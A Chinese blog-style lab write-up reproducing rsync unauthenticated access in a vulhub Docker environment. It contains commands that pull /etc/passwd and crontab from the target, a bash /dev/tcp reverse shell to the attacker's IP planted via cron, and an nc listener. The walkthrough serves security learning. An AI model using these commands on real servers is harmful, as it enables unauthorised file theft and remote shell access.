vulhub之rsync未授权访问漏洞复现&利用

0x00 前言

最近几天遇到了一些rsync未授权访问的漏洞,然后自己也不是很熟悉,正好vulhub靶场里面有,而且最后会有反弹shell的内容我也没太熟悉,所以感觉是个很好的机会可以一并学习。嗯嗯我可以!(我真的是太菜了呀)

0x01 环境

起docker。切进目录cd vulhub/rsync/common
然后起服务。

sudo docker-compose build
sudo docker-compose up -d

我之前起过,然后再起的时候遇到了run之后直接自己关掉的情况,就关掉重新开了,关掉的命令应该是sudo docker-compose down
靶机ip:10.222.100.117 MAC
攻击机ip:10.211.55.3 kali

0x02 复现

环境启动后,开始在kali上边操作,首先用rsync命令访问一哈:

rsync rsync://your-ip:873/
rsync访问.png

真不错,看到有两个模块,那我们先看看src里面有什么

rsync rsync://10.222.100.117:873/src
图片.png

看起来东西不少,而且像是一个Linux根目录,那我们看看能不能把etc/passwd下载下来。

rsync -av rsync://10.222.100.117:873/src/etc/passwd 1.txt

这个命令是把etc/passwd里的内容下载到我当前目录的 1.txt里面了,看看内容


图片.png

看到已经下载下来了,那我们上传一个shell把它放在一个定时任务里面,然后nc等到反弹shell就可以成功了。

接下来,切到定时任务的目录下,把它的配置文件下载下来。
rsync -av rsync://10.222.100.117:873/src/etc/crontab crontab.txt

图片.png

看看内容,这句话的意思是,每17分钟执行一次/etc/cron.hourly这个命令
图片.png

写入shell任意文件 vim写就可以

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.211.55.3/4444 0>&1

写完是这样的

图片.png

然后把shell上传
图片.png

然后nc监听端口
nc -nvv -lp 4444
每小时第17分钟执行,反弹shell成功。
图片.png

当然也可以,修改定时的时间,比如改成在2分的时候执行。
这个需要在靶机上

docker ps

sudo docker exec -it 4ff06ed20a8b -bash
图片.png

然后vim更改,应该需要安装vim的
命令是

apt-get update
apt-get install vim
vim crontab

把时间改成你想要的时间



然后等待时间的到来, 反弹shell成功。

你可能感兴趣的:(vulhub之rsync未授权访问漏洞复现&利用)